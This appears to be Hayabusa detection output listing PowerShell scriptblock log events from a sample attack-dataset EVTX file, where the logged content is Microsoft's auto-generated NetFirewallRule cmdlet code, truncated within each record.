[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSet",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote 
Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetFirewallRule' -Alias '*' function Copy-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] 
${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSet",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Name='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuild",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Name='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 